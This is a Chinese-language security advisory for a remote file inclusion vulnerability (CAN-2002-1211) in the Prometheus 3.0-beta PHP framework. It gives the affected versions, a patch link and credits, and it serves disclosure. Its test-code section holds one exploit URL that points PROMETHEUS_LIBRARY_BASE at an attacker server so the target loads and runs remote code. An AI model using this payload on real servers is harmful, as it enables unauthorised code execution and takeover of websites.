Jason Orcutt Prometheus远程文件包含漏洞发布时间:2002-11-01 更新时间:2003-02-27 严重程度:高 威胁程度:普通用户访问权限 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:6087 CVE(CAN) ID:CAN-2002-1211 受影响系统 Jason Orcutt Prometheus 3.0 -beta详细描述 Jason Orcutt's Prometheus是WEB应用程序架构系统。 Prometheus存在漏洞可导致远程攻击者包含远程服务器上的文件。 Prometheus中index.php脚本对$PROMETHEUS_LIBRARY_BASE变量缺少正确的处理,可导致攻击者提交恶意参数而指定参数为攻击者拥有的服务器上的文件,以WEB权限执行恶意文件中的代码。 测试代码 http://target.server/prometheus-all/index.php?PROMETHEUS_LIBRARY_BASE=http://attackers.server/&PHP_AUTO_LOAD_LIB=0 解决方案 补丁下载: http://phpsecure.rootzmail.net/Prometheus6.0.zip 相关信息 Karol Wiesek <appelast@bsquad.sm.pl>. 参考:http://www.securityfocus.com/archive/1/298186 相关主页:http://prometheus.zerodivide.net/ |
